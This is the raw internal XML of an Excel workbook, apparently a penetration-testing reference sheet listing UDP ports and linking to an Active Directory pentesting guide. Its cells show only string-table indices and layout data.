        <v>56406</v>
      </c>
      <c r="F25" s="9" t="str">
        <f t="shared" si="1"/>
        <v>udp</v>
      </c>
      <c r="G25" s="2" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="26" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A26" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C26" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D26" s="2" t="s">
        <v>37</v>
      </c>
      <c r="E26" s="8" t="str">
        <f t="shared" si="0"/>
        <v>56642</v>
      </c>
      <c r="F26" s="9" t="str">
        <f t="shared" si="1"/>
        <v>udp</v>
      </c>
      <c r="G26" s="2" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="27" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A27" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C27" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D27" s="2" t="s">
        <v>22</v>
      </c>
      <c r="E27" s="8" t="str">
        <f t="shared" si="0"/>
        <v>57417</v>
      </c>
      <c r="F27" s="9" t="str">
        <f t="shared" si="1"/>
        <v>udp</v>
      </c>
      <c r="G27" s="2" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="28" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A28" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>71</v>
      </c>
      <c r="C28" s="2" t="s">
        <v>79</v>
      </c>
      <c r="D28" s="2" t="s">
        <v>29</v>
      </c>
      <c r="E28" s="8" t="str">
        <f t="shared" si="0"/>
        <v>57596</v>
      </c>
      <c r="F28" s="9" t="str">
        <f t="shared" si="1"/>
        <v>udp</v>
      </c>
      <c r="G28" s="2" t="s">
        <v>84</v>
      </c>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:K29">
    <sortCondition ref="F2:F29"/>
    <sortCondition ref="E2:E29"/>
  </sortState>
  <phoneticPr fontId="3" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="J7" r:id="rId1" display="https://www.hackingarticles.in/active-directory-pentesting-using-netexec-tool-a-complete-guide/" xr:uid="{3691158C-B82C-4B50-A509-5A08DB26510C}"/>
    <hyperlink ref="J6" r:id="rId2" xr:uid="{AB74A675-A9DF-4973-8748-D42BCCFC3BA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G23"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C15" sqref="C15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="23.44140625" style="1" customWidth="1"/>
    <col min="2" max="2" width="39.109375" style="2" customWidth="1"/>
    <col min="3" max="3" width="18.5546875" style="2" customWidth="1"/>
    <col min="4" max="4" width="34.33203125" style="2" customWidth="1"/>
    <col min="5" max="5" width="64" style="1" customWidth="1"/>
    <col min="6" max="6" width="50.21875" style="1" customWidth="1"/>
    <col min="7" max="7" width="49.44140625" style="1" customWidth="1"/>
    <col min="8" max="16384" width="8.88671875" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" s="3" customFormat="1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="3" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>17</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>16</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="E1" s="3" t="s">
        <v>5</v>
      </c>
      <c r="F1" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E2" s="2"/>
      <c r="F2" s="6"/>
    </row>
    <row r="3" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E3" s="2"/>
    </row>
    <row r="5" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E5" s="4"/>
    </row>
    <row r="23" spans="5:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="E23" s="2"/>
      <c r="F23" s="7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2"/>
  <sheetViews>
    <sheetView topLeftCell="E1" workbookViewId="0">
      <selection activeCell="F9" sqref="F9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="16.109375" style="2" customWidth="1"/>
    <col min="2" max="2" width="12.109375" style="2" customWidth="1"/>
    <col min="3" max="3" width="10.44140625" style="2" customWidth="1"/>
    <col min="4" max="4" width="11.5546875" style="2" customWidth="1"/>
    <col min="5" max="5" width="17.6640625" style="2" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="33.77734375" style="2" customWidth="1"/>
    <col min="7" max="7" width="25.109375" style="2" customWidth="1"/>
    <col min="8" max="8" width="69.44140625" style="2" customWidth="1"/>
    <col min="9" max="10" width="33.44140625" style="2" customWidth="1"/>
    <col min="11" max="11" width="33.77734375" style="2" customWidth="1"/>
    <col min="12" max="16384" width="8.88671875" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" s="4" customForma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5" t="s">
        <v>21</v>
      </c>
      <c r="K1" s="4" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:11" ht="85.8" customHeight="1" x14ac:dyDescent="0.3">
      <c r="I2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32"/>
  <sheetViews>
    <sheetView topLeftCell="A10" workbookViewId="0">
      <selection activeCell="A17" sqref="A17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="118.88671875" style="9" bestFit="1" customWidth="1"/>
    <col min="2" max="16384" width="8.88671875" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="3" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="3" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="4" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="9" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="5" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="9" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="6" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="9" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="7" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="9" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="8" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" s="10" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="9" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="10" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="10" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A10" s="10" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="11" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="10" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="12" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" s="10" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="13" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A13" s="10" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="14" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A14" s="10" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="15" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A15" s="10" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="16" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A16" s="10" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="17" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A17" s="10" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="18" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A18" s="10" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="19" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A19" s="10" t="s">
        <v>77</v>
      </c>
    </row>
    <row r="20" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A20" s="10" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="21" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A21" s="10" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="22" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A22" s="10" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="23" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A23" s="10" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="24" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A24" s="10" t="s">
        <v>109</v>
      </c>
    </row>
    <row r="25" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A25" s="10" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="26" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A26" s="10" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="27" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A27" s="10" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="28" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A28" s="9" t="s">
        <v>87</v>
      </c>
    </row>
    <row r="29" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A29" s="9" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="30" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A30" s="9" t="s">
        <v>113</v>
      </c>
    </row>
    <row r="31" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A31" s="9" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="32" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A32" s="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3"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A7" sqref="A7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73</v>
      </c>
    </row>
    <row r="2" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="3" spans="1:1" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="2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Web App</vt:lpstr>
      <vt:lpstr>On host</vt:lpstr>
      <vt:lpstr>Commands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2026-06-24T00:20:03Z</dcterms:modified>
</cp:coreProperties>
</file>